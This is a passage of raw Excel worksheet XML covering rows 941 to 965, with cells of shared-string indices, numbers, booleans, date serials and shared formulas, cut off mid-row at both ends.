      <c r="R941" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S941" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="942">
      <c r="A942" s="1">
        <v>11706.0</v>
      </c>
      <c r="B942" s="2" t="s">
        <v>4119</v>
      </c>
      <c r="C942" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D942" s="2" t="s">
        <v>4120</v>
      </c>
      <c r="E942" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F942" s="1" t="s">
        <v>4121</v>
      </c>
      <c r="G942" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H942" s="4">
        <v>44839.79722222222</v>
      </c>
      <c r="I942" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J942" s="1" t="s">
        <v>4122</v>
      </c>
      <c r="K942" s="2" t="s">
        <v>4123</v>
      </c>
      <c r="L942" s="1">
        <v>4.0</v>
      </c>
      <c r="M942" s="1">
        <v>4.0</v>
      </c>
      <c r="N942" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O942" s="1" t="s">
        <v>4124</v>
      </c>
      <c r="P942" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q942" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R942" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S942" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="943">
      <c r="A943" s="1">
        <v>11707.0</v>
      </c>
      <c r="B943" s="2" t="s">
        <v>4125</v>
      </c>
      <c r="C943" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D943" s="2" t="s">
        <v>4120</v>
      </c>
      <c r="E943" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F943" s="1" t="s">
        <v>4126</v>
      </c>
      <c r="G943" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H943" s="4">
        <v>44870.31736111111</v>
      </c>
      <c r="I943" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J943" s="1" t="s">
        <v>4122</v>
      </c>
      <c r="K943" s="2" t="s">
        <v>4123</v>
      </c>
      <c r="L943" s="1">
        <v>4.0</v>
      </c>
      <c r="M943" s="1">
        <v>4.0</v>
      </c>
      <c r="N943" s="1" t="s">
        <v>4127</v>
      </c>
      <c r="O943" s="1" t="s">
        <v>4124</v>
      </c>
      <c r="P943" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q943" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R943" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S943" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="944">
      <c r="A944" s="1">
        <v>11709.0</v>
      </c>
      <c r="B944" s="2" t="s">
        <v>4128</v>
      </c>
      <c r="C944" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D944" s="2" t="s">
        <v>4120</v>
      </c>
      <c r="E944" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F944" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G944" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H944" s="4">
        <v>44687.373611111114</v>
      </c>
      <c r="I944" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J944" s="1" t="s">
        <v>4122</v>
      </c>
      <c r="K944" s="2" t="s">
        <v>4123</v>
      </c>
      <c r="L944" s="1">
        <v>4.0</v>
      </c>
      <c r="M944" s="1">
        <v>4.0</v>
      </c>
      <c r="N944" s="1" t="s">
        <v>78</v>
      </c>
      <c r="O944" s="1" t="s">
        <v>4124</v>
      </c>
      <c r="P944" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q944" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R944" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S944" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="945">
      <c r="A945" s="1">
        <v>11746.0</v>
      </c>
      <c r="B945" s="2" t="s">
        <v>4129</v>
      </c>
      <c r="C945" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D945" s="2" t="s">
        <v>4130</v>
      </c>
      <c r="E945" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F945" s="1" t="s">
        <v>4131</v>
      </c>
      <c r="G945" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H945" s="4">
        <v>43717.65</v>
      </c>
      <c r="I945" s="1" t="s">
        <v>2345</v>
      </c>
      <c r="J945" s="1" t="s">
        <v>4132</v>
      </c>
      <c r="K945" s="2" t="s">
        <v>4133</v>
      </c>
      <c r="L945" s="1">
        <v>2.0</v>
      </c>
      <c r="M945" s="1">
        <v>4.0</v>
      </c>
      <c r="N945" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O945" s="1" t="s">
        <v>4134</v>
      </c>
      <c r="P945" s="1" t="s">
        <v>4135</v>
      </c>
      <c r="Q945" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R945" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S945" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="946">
      <c r="A946" s="1">
        <v>11747.0</v>
      </c>
      <c r="B946" s="2" t="s">
        <v>4136</v>
      </c>
      <c r="C946" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D946" s="2" t="s">
        <v>4130</v>
      </c>
      <c r="E946" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F946" s="1" t="s">
        <v>4137</v>
      </c>
      <c r="G946" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H946" s="4">
        <v>43717.68680555555</v>
      </c>
      <c r="I946" s="1" t="s">
        <v>2345</v>
      </c>
      <c r="J946" s="1" t="s">
        <v>4132</v>
      </c>
      <c r="K946" s="2" t="s">
        <v>4133</v>
      </c>
      <c r="L946" s="1">
        <v>2.0</v>
      </c>
      <c r="M946" s="1">
        <v>4.0</v>
      </c>
      <c r="N946" s="1" t="s">
        <v>1497</v>
      </c>
      <c r="O946" s="1" t="s">
        <v>4134</v>
      </c>
      <c r="P946" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q946" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R946" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S946" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="947">
      <c r="A947" s="1">
        <v>11748.0</v>
      </c>
      <c r="B947" s="2" t="s">
        <v>4138</v>
      </c>
      <c r="C947" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D947" s="2" t="s">
        <v>4130</v>
      </c>
      <c r="E947" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F947" s="1" t="s">
        <v>4131</v>
      </c>
      <c r="G947" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H947" s="4">
        <v>43717.691666666666</v>
      </c>
      <c r="I947" s="1" t="s">
        <v>2345</v>
      </c>
      <c r="J947" s="1" t="s">
        <v>4132</v>
      </c>
      <c r="K947" s="2" t="s">
        <v>4133</v>
      </c>
      <c r="L947" s="1">
        <v>2.0</v>
      </c>
      <c r="M947" s="1">
        <v>4.0</v>
      </c>
      <c r="N947" s="1" t="s">
        <v>700</v>
      </c>
      <c r="O947" s="1" t="s">
        <v>4134</v>
      </c>
      <c r="P947" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q947" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R947" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S947" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="948">
      <c r="A948" s="1">
        <v>11843.0</v>
      </c>
      <c r="B948" s="2" t="s">
        <v>4139</v>
      </c>
      <c r="C948" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D948" s="2" t="s">
        <v>4140</v>
      </c>
      <c r="E948" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F948" s="1" t="s">
        <v>993</v>
      </c>
      <c r="G948" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H948" s="1" t="s">
        <v>4141</v>
      </c>
      <c r="I948" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J948" s="1" t="s">
        <v>4142</v>
      </c>
      <c r="K948" s="2" t="s">
        <v>4143</v>
      </c>
      <c r="L948" s="1">
        <v>5.0</v>
      </c>
      <c r="M948" s="1">
        <v>5.0</v>
      </c>
      <c r="N948" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O948" s="1" t="s">
        <v>4144</v>
      </c>
      <c r="P948" s="1" t="s">
        <v>1232</v>
      </c>
      <c r="Q948" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R948" s="2">
        <f t="shared" si="2"/>
        <v>11</v>
      </c>
      <c r="S948" s="1">
        <f t="shared" si="3"/>
        <v>11</v>
      </c>
    </row>
    <row r="949">
      <c r="A949" s="1">
        <v>11848.0</v>
      </c>
      <c r="B949" s="2" t="s">
        <v>4145</v>
      </c>
      <c r="C949" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D949" s="2" t="s">
        <v>4146</v>
      </c>
      <c r="E949" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F949" s="1" t="s">
        <v>153</v>
      </c>
      <c r="G949" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H949" s="1" t="s">
        <v>4147</v>
      </c>
      <c r="I949" s="1" t="s">
        <v>1292</v>
      </c>
      <c r="J949" s="1" t="s">
        <v>4148</v>
      </c>
      <c r="K949" s="2" t="s">
        <v>4149</v>
      </c>
      <c r="L949" s="1">
        <v>1.0</v>
      </c>
      <c r="M949" s="1">
        <v>1.0</v>
      </c>
      <c r="N949" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O949" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P949" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q949" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R949" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S949" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="950">
      <c r="A950" s="1">
        <v>11850.0</v>
      </c>
      <c r="B950" s="2" t="s">
        <v>4150</v>
      </c>
      <c r="C950" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D950" s="2" t="s">
        <v>4151</v>
      </c>
      <c r="E950" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F950" s="1" t="s">
        <v>741</v>
      </c>
      <c r="G950" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H950" s="1" t="s">
        <v>4152</v>
      </c>
      <c r="I950" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J950" s="1" t="s">
        <v>4153</v>
      </c>
      <c r="K950" s="2" t="s">
        <v>4154</v>
      </c>
      <c r="L950" s="1">
        <v>1.0</v>
      </c>
      <c r="M950" s="1">
        <v>1.0</v>
      </c>
      <c r="N950" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O950" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P950" s="1" t="s">
        <v>1338</v>
      </c>
      <c r="Q950" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R950" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S950" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="951">
      <c r="A951" s="1">
        <v>11851.0</v>
      </c>
      <c r="B951" s="2" t="s">
        <v>4155</v>
      </c>
      <c r="C951" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D951" s="2" t="s">
        <v>4156</v>
      </c>
      <c r="E951" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F951" s="1" t="s">
        <v>4157</v>
      </c>
      <c r="G951" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H951" s="4">
        <v>44383.97986111111</v>
      </c>
      <c r="I951" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J951" s="1" t="s">
        <v>4158</v>
      </c>
      <c r="K951" s="2" t="s">
        <v>4159</v>
      </c>
      <c r="L951" s="1">
        <v>13.0</v>
      </c>
      <c r="M951" s="1">
        <v>21.0</v>
      </c>
      <c r="N951" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O951" s="1" t="s">
        <v>4160</v>
      </c>
      <c r="P951" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q951" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R951" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S951" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="952">
      <c r="A952" s="1">
        <v>11853.0</v>
      </c>
      <c r="B952" s="2" t="s">
        <v>4161</v>
      </c>
      <c r="C952" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D952" s="2" t="s">
        <v>4156</v>
      </c>
      <c r="E952" s="2" t="s">
        <v>1401</v>
      </c>
      <c r="F952" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G952" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H952" s="4">
        <v>44414.009722222225</v>
      </c>
      <c r="I952" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J952" s="1" t="s">
        <v>4158</v>
      </c>
      <c r="K952" s="2" t="s">
        <v>4159</v>
      </c>
      <c r="L952" s="1">
        <v>13.0</v>
      </c>
      <c r="M952" s="1">
        <v>21.0</v>
      </c>
      <c r="N952" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O952" s="1" t="s">
        <v>4160</v>
      </c>
      <c r="P952" s="1" t="s">
        <v>1338</v>
      </c>
      <c r="Q952" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R952" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S952" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="953">
      <c r="A953" s="1">
        <v>11856.0</v>
      </c>
      <c r="B953" s="2" t="s">
        <v>4162</v>
      </c>
      <c r="C953" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D953" s="2" t="s">
        <v>4156</v>
      </c>
      <c r="E953" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F953" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G953" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H953" s="4">
        <v>44414.02569444444</v>
      </c>
      <c r="I953" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J953" s="1" t="s">
        <v>4158</v>
      </c>
      <c r="K953" s="2" t="s">
        <v>4159</v>
      </c>
      <c r="L953" s="1">
        <v>13.0</v>
      </c>
      <c r="M953" s="1">
        <v>21.0</v>
      </c>
      <c r="N953" s="1" t="s">
        <v>78</v>
      </c>
      <c r="O953" s="1" t="s">
        <v>4160</v>
      </c>
      <c r="P953" s="1" t="s">
        <v>1338</v>
      </c>
      <c r="Q953" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R953" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S953" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="954">
      <c r="A954" s="1">
        <v>11857.0</v>
      </c>
      <c r="B954" s="2" t="s">
        <v>4163</v>
      </c>
      <c r="C954" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D954" s="2" t="s">
        <v>4156</v>
      </c>
      <c r="E954" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F954" s="1" t="s">
        <v>4164</v>
      </c>
      <c r="G954" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H954" s="4">
        <v>44414.02777777778</v>
      </c>
      <c r="I954" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J954" s="1" t="s">
        <v>4158</v>
      </c>
      <c r="K954" s="2" t="s">
        <v>4159</v>
      </c>
      <c r="L954" s="1">
        <v>13.0</v>
      </c>
      <c r="M954" s="1">
        <v>21.0</v>
      </c>
      <c r="N954" s="1" t="s">
        <v>202</v>
      </c>
      <c r="O954" s="1" t="s">
        <v>4160</v>
      </c>
      <c r="P954" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q954" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R954" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S954" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="955">
      <c r="A955" s="1">
        <v>11858.0</v>
      </c>
      <c r="B955" s="2" t="s">
        <v>4165</v>
      </c>
      <c r="C955" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D955" s="2" t="s">
        <v>4156</v>
      </c>
      <c r="E955" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F955" s="1" t="s">
        <v>4157</v>
      </c>
      <c r="G955" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H955" s="4">
        <v>44414.03680555556</v>
      </c>
      <c r="I955" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J955" s="1" t="s">
        <v>4158</v>
      </c>
      <c r="K955" s="2" t="s">
        <v>4159</v>
      </c>
      <c r="L955" s="1">
        <v>13.0</v>
      </c>
      <c r="M955" s="1">
        <v>21.0</v>
      </c>
      <c r="N955" s="1" t="s">
        <v>1430</v>
      </c>
      <c r="O955" s="1" t="s">
        <v>4160</v>
      </c>
      <c r="P955" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q955" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R955" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S955" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="956">
      <c r="A956" s="1">
        <v>11867.0</v>
      </c>
      <c r="B956" s="2" t="s">
        <v>4166</v>
      </c>
      <c r="C956" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D956" s="2" t="s">
        <v>4156</v>
      </c>
      <c r="E956" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F956" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G956" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H956" s="4">
        <v>44414.62569444445</v>
      </c>
      <c r="I956" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J956" s="1" t="s">
        <v>4158</v>
      </c>
      <c r="K956" s="2" t="s">
        <v>4159</v>
      </c>
      <c r="L956" s="1">
        <v>13.0</v>
      </c>
      <c r="M956" s="1">
        <v>21.0</v>
      </c>
      <c r="N956" s="1" t="s">
        <v>1323</v>
      </c>
      <c r="O956" s="1" t="s">
        <v>4160</v>
      </c>
      <c r="P956" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q956" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R956" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S956" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="957">
      <c r="A957" s="1">
        <v>11871.0</v>
      </c>
      <c r="B957" s="2" t="s">
        <v>4167</v>
      </c>
      <c r="C957" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D957" s="2" t="s">
        <v>4156</v>
      </c>
      <c r="E957" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F957" s="1" t="s">
        <v>2255</v>
      </c>
      <c r="G957" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H957" s="4">
        <v>44475.09652777778</v>
      </c>
      <c r="I957" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J957" s="1" t="s">
        <v>4158</v>
      </c>
      <c r="K957" s="2" t="s">
        <v>4159</v>
      </c>
      <c r="L957" s="1">
        <v>13.0</v>
      </c>
      <c r="M957" s="1">
        <v>21.0</v>
      </c>
      <c r="N957" s="1" t="s">
        <v>187</v>
      </c>
      <c r="O957" s="1" t="s">
        <v>4160</v>
      </c>
      <c r="P957" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q957" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R957" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S957" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="958">
      <c r="A958" s="1">
        <v>11872.0</v>
      </c>
      <c r="B958" s="2" t="s">
        <v>4168</v>
      </c>
      <c r="C958" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D958" s="2" t="s">
        <v>4169</v>
      </c>
      <c r="E958" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F958" s="1" t="s">
        <v>4170</v>
      </c>
      <c r="G958" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H958" s="1" t="s">
        <v>4171</v>
      </c>
      <c r="I958" s="1" t="s">
        <v>1078</v>
      </c>
      <c r="J958" s="1" t="s">
        <v>4172</v>
      </c>
      <c r="K958" s="2" t="s">
        <v>4173</v>
      </c>
      <c r="L958" s="1">
        <v>2.0</v>
      </c>
      <c r="M958" s="1">
        <v>2.0</v>
      </c>
      <c r="N958" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O958" s="1" t="s">
        <v>4174</v>
      </c>
      <c r="P958" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q958" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R958" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S958" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="959">
      <c r="A959" s="1">
        <v>11880.0</v>
      </c>
      <c r="B959" s="2" t="s">
        <v>4175</v>
      </c>
      <c r="C959" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D959" s="2" t="s">
        <v>4176</v>
      </c>
      <c r="E959" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F959" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G959" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H959" s="4">
        <v>44531.99097222222</v>
      </c>
      <c r="I959" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J959" s="1" t="s">
        <v>4177</v>
      </c>
      <c r="K959" s="2" t="s">
        <v>4178</v>
      </c>
      <c r="L959" s="1">
        <v>1.0</v>
      </c>
      <c r="M959" s="1">
        <v>1.0</v>
      </c>
      <c r="N959" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O959" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P959" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q959" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R959" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S959" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="960">
      <c r="A960" s="1">
        <v>11888.0</v>
      </c>
      <c r="B960" s="2" t="s">
        <v>4179</v>
      </c>
      <c r="C960" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D960" s="2" t="s">
        <v>4180</v>
      </c>
      <c r="E960" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F960" s="1" t="s">
        <v>685</v>
      </c>
      <c r="G960" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H960" s="4">
        <v>44415.11041666667</v>
      </c>
      <c r="I960" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J960" s="1" t="s">
        <v>4181</v>
      </c>
      <c r="K960" s="2" t="s">
        <v>4182</v>
      </c>
      <c r="L960" s="1">
        <v>6.0</v>
      </c>
      <c r="M960" s="1">
        <v>12.0</v>
      </c>
      <c r="N960" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O960" s="1" t="s">
        <v>4183</v>
      </c>
      <c r="P960" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q960" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R960" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S960" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="961">
      <c r="A961" s="1">
        <v>11889.0</v>
      </c>
      <c r="B961" s="2" t="s">
        <v>4184</v>
      </c>
      <c r="C961" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D961" s="2" t="s">
        <v>4185</v>
      </c>
      <c r="E961" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F961" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G961" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H961" s="4">
        <v>44415.1125</v>
      </c>
      <c r="I961" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J961" s="1" t="s">
        <v>4181</v>
      </c>
      <c r="K961" s="2" t="s">
        <v>4182</v>
      </c>
      <c r="L961" s="1">
        <v>6.0</v>
      </c>
      <c r="M961" s="1">
        <v>12.0</v>
      </c>
      <c r="N961" s="1" t="s">
        <v>202</v>
      </c>
      <c r="O961" s="1" t="s">
        <v>4183</v>
      </c>
      <c r="P961" s="1" t="s">
        <v>4186</v>
      </c>
      <c r="Q961" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R961" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S961" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="962">
      <c r="A962" s="1">
        <v>11890.0</v>
      </c>
      <c r="B962" s="2" t="s">
        <v>4187</v>
      </c>
      <c r="C962" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D962" s="2" t="s">
        <v>4180</v>
      </c>
      <c r="E962" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F962" s="1" t="s">
        <v>685</v>
      </c>
      <c r="G962" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H962" s="4">
        <v>44415.118055555555</v>
      </c>
      <c r="I962" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J962" s="1" t="s">
        <v>4181</v>
      </c>
      <c r="K962" s="2" t="s">
        <v>4182</v>
      </c>
      <c r="L962" s="1">
        <v>6.0</v>
      </c>
      <c r="M962" s="1">
        <v>12.0</v>
      </c>
      <c r="N962" s="1" t="s">
        <v>237</v>
      </c>
      <c r="O962" s="1" t="s">
        <v>4183</v>
      </c>
      <c r="P962" s="1" t="s">
        <v>2216</v>
      </c>
      <c r="Q962" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R962" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S962" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="963">
      <c r="A963" s="1">
        <v>11891.0</v>
      </c>
      <c r="B963" s="2" t="s">
        <v>4188</v>
      </c>
      <c r="C963" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D963" s="2" t="s">
        <v>4180</v>
      </c>
      <c r="E963" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F963" s="1" t="s">
        <v>2568</v>
      </c>
      <c r="G963" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H963" s="4">
        <v>44415.11875</v>
      </c>
      <c r="I963" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J963" s="1" t="s">
        <v>4181</v>
      </c>
      <c r="K963" s="2" t="s">
        <v>4182</v>
      </c>
      <c r="L963" s="1">
        <v>6.0</v>
      </c>
      <c r="M963" s="1">
        <v>12.0</v>
      </c>
      <c r="N963" s="1" t="s">
        <v>205</v>
      </c>
      <c r="O963" s="1" t="s">
        <v>4183</v>
      </c>
      <c r="P963" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q963" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R963" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S963" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="964">
      <c r="A964" s="1">
        <v>11892.0</v>
      </c>
      <c r="B964" s="2" t="s">
        <v>4189</v>
      </c>
      <c r="C964" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D964" s="2" t="s">
        <v>4180</v>
      </c>
      <c r="E964" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F964" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G964" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H964" s="4">
        <v>44415.125</v>
      </c>
      <c r="I964" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J964" s="1" t="s">
        <v>4181</v>
      </c>
      <c r="K964" s="2" t="s">
        <v>4182</v>
      </c>
      <c r="L964" s="1">
        <v>6.0</v>
      </c>
      <c r="M964" s="1">
        <v>12.0</v>
      </c>
      <c r="N964" s="1" t="s">
        <v>677</v>
      </c>
      <c r="O964" s="1" t="s">
        <v>4183</v>
      </c>
      <c r="P964" s="1" t="s">
        <v>4190</v>
      </c>
      <c r="Q964" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R964" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S964" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="965">
      <c r="A965" s="1">
        <v>11893.0</v>
      </c>
      <c r="B965" s="2" t="s">
        <v>4191</v>
      </c>
      <c r="C965" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D965" s="2" t="s">
        <v>4180</v>
      </c>
      <c r="E965" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F965" s="1" t="s">
        <v>685</v>
      </c>
      <c r="G965" s="1" t="b">
        <v>0</v>
